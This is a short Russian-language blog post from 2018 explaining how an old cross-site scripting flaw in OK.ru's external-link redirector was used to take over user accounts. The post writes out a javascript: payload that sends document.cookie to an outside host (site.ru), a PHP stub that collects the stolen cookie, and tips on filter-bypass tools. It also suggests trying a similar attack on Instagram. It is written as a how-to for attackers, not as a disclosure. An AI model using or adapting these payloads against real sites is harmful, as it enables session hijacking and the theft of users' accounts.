May 25, 2018

Cтарая уязвимость в ОК.РУ

Давным давно в ок.ру взломать пользователя не состовляла труда. Достаточно было просто кликнуть по ссылке и кукисы у нас. Правда ссылка получалось большой, но сократить можно. Перед тем как отправить перейти по любой ссылке(например google.com), скопируем адрес ссылки - результат:

https://www.ok.ru/dk?cmd=logExternal&st.name=externalLinkRedirect&st.link=https%3A%2F%2Fgoogle.com

Вы наверное уже сами дагодались о том что конец ссылки и говорит какя была уязвимость.

Как выяснили, после "st.link=" ссылка на сайт котороя была указана в коментариях или в лс и т.д.

Следующий ход подменить обычную ссылку на вредоностный код. Для примера вместо вредоностного кода попробуем javascript:alert(5); в данный момент ОК реагирует на него как на не безопасный сайт.

Раньше результат был другим, примерно таким:

Возможно может быть есть способ обойти фильтр, который не даёт вбить вредоностный код. Можно попробовать использовать разные проги или например тот самый HackBar который есть как на андроид так и для винды как доп.приложение хрома.

Если у вас всё таки получится вызвать дыру, угнать куки можно таким не сложным образом, в место ссылки подставить:

https://www.ok.ru/dk?cmd=logExternal&st.name=externalLinkRedirect&st.link=
javascript:window.location.href="http://site.ru/index.php?cookie=" + document.cookie;

и перехватить:

<?php
$sniff = $_GET['cookie'];
...
?>

Затем использовать cookie editor и подменить значение кук.

В инстаграме почти тоже самое, но отличается тем что там для перехода по ссылке требуется токен который постояно меняется, возможно если устронить эту проблему или препятствие, думаю можно будет что то попробовать.